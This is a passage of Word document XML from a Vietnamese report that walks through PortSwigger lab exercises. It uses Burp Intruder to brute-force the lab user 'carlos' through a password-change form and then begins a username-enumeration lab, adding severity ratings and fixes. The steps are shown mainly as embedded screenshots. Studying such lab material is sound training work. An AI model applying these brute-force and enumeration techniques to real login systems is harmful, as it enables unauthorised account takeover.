        <w:t xml:space="preserve">đã </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>bắt được và được gửi vào intruder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15EBBD" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00EE6940">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36587B94" wp14:editId="7B89A9F0">
            <wp:extent cx="6115050" cy="2667635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1583235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35658" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId197"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2667635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01A1C1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE6940">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B495FD6" wp14:editId="78EE741F">
            <wp:extent cx="5283472" cy="977950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="550714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14664" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId198"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5283472" cy="977950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A738C3" w14:textId="1D6E055F" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00BC4913" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">Tiếp theo </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t>vào phần Intruder để thực hiện tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54396DE6" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00EE6940">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE9D24E" wp14:editId="1B35DCB8">
            <wp:extent cx="6115050" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1483473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73043" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="845820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A0153" w14:textId="3AA0BB41" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Tiếp theo tại phần Positions, chọn $peter$ để tấn công với pass1 và pass2 khác nhau của</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6940">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E518ECA" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE6940">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C614559" wp14:editId="3AAE649D">
            <wp:extent cx="4845299" cy="3753043"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1295529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29378" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId200"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4845299" cy="3753043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DFB9B7" w14:textId="433C70A6" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00F67FB2" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Tiếp theo tại phần Payloads, truyền các payload được chương trình cấp như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4959F" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>+ Payloads được cấp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CBD37" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00EE6940">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F56A97C" wp14:editId="4AB0DAB4">
            <wp:extent cx="6115050" cy="5048885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1435617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17638" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="5048885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D03D99F" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>+ Sau khi truyền payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C07F28" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009179B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC3115D" wp14:editId="3F7E2528">
            <wp:extent cx="4400776" cy="4864350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1947492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92861" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4400776" cy="4864350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAE592" w14:textId="3E81FA86" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Tiếp theo tại phần Settings, tại Grep-Match</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>thêm thông tin:</w:t>
      </w:r>
      <w:r w:rsidRPr="009179B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009179B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New passwords do not match</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>, n</w:t>
      </w:r>
      <w:r w:rsidRPr="009179B8">
        <w:t>hư sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5C2D1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009179B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6564397C" wp14:editId="50FE2E9A">
            <wp:extent cx="4102311" cy="4457929"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1610737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737625" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId203"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4102311" cy="4457929"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FAF48" w14:textId="3004D08D" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Đến đây</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bắt đầu</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t xml:space="preserve"> thực hiện</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68643173" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="009179B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424E9AA5" wp14:editId="5C8F7778">
            <wp:extent cx="6115050" cy="542290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1633328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28413" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId204"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="542290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C9EFE0" w14:textId="15BF4580" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t xml:space="preserve"> như sau</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04622D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="004E3E0C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06E71408" wp14:editId="69F83DC9">
            <wp:extent cx="6115050" cy="4082415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="811012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12308" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4082415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F375793" w14:textId="13E88D4C" w:rsidR="00F67FB2" w:rsidRPr="004E3E0C" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">hực hiện nhập username là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004E3E0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> và password là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004E3E0C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004E3E0C">
        <w:t xml:space="preserve">Kết quả thành công </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004E3E0C">
        <w:t>đã hoàn thành bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09278CBB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="004E3E0C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="736741C6" wp14:editId="5B534F80">
            <wp:extent cx="6115050" cy="3192780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="862611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11822" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3192780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4E8BD1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00190E79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>High (cao) vì lỗ hổng này cho phép tấn công vét cạn mật khẩu, tăng nguy cơ bị tấn công và xâm nhập trái phép vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956BF5E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00315F42" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00190E79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Cần thực hiện chặn các request liên tục đến server để ngăn chặn tấn công vét cạn mật khẩu. Đồng thời, cần cập nhật và cải thiện cơ chế xác thực để giảm thiểu nguy cơ từ các phương pháp tấn công như vét cạn mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D314B3" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc182429527"/>
      <w:bookmarkStart w:id="85" w:name="_Toc182909888"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7D45">
        <w:t>: Username enumeration via different responses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="2B2F0F40" w14:textId="53DA8BB8" w:rsidR="00A36146" w:rsidRDefault="00A36146" w:rsidP="00392965">
      <w:hyperlink r:id="rId207" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2811EF30" w14:textId="3D51A03E" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mô tả lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidR="00392965" w:rsidRPr="00A36146">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36146">
        <w:t>ỗ hổng liên quan đến việc tìm kiếm username và password thông qua thời gian phản hồi khác nhau từ server khi thực hiện đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311DBBA" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F275FDC" w14:textId="381C1747" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00190E79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00190E79">
        <w:t>ruy cập vào task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54956D56" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00691272">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="261DC408" wp14:editId="5EF63B46">
            <wp:extent cx="6115050" cy="2934335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1803168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68652" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId208"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2934335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390642C" w14:textId="3CCFDC52" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00F67FB2" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Tiếp theo thực hiện bắt gói tin khi nhập sai username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F9CFD" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00691272">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="274CDA80" wp14:editId="4A6733D2">
            <wp:extent cx="6115050" cy="3810000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1051864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64442" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="501667CE" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00691272">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743BD887" wp14:editId="36EE99B2">
            <wp:extent cx="6115050" cy="2842895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="780807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07395" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId210"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2842895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06993822" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Tại Burp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B3237" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00691272">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8B15CE" wp14:editId="44D07F5D">
            <wp:extent cx="6115050" cy="2802890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="592543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43603" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2802890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9234DC" w14:textId="046DD516" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>ửi gói tin này đến Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23029D56" w14:textId="3CB362BB" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">hực hiện tấn công để lấy Username </w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t xml:space="preserve">bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>sử dụng kĩ thuật Brute-force</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365AB5AC" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C109D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DB2F29F" wp14:editId="25127D74">
            <wp:extent cx="6115050" cy="4063365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2001768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68610" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId212"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4063365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8619F" w14:textId="2509D89C" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00F67FB2" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Và payload (được cung cấp sẵn của yêu cầu</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve"> bài</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t xml:space="preserve"> lab</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5FE4E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C109D2">
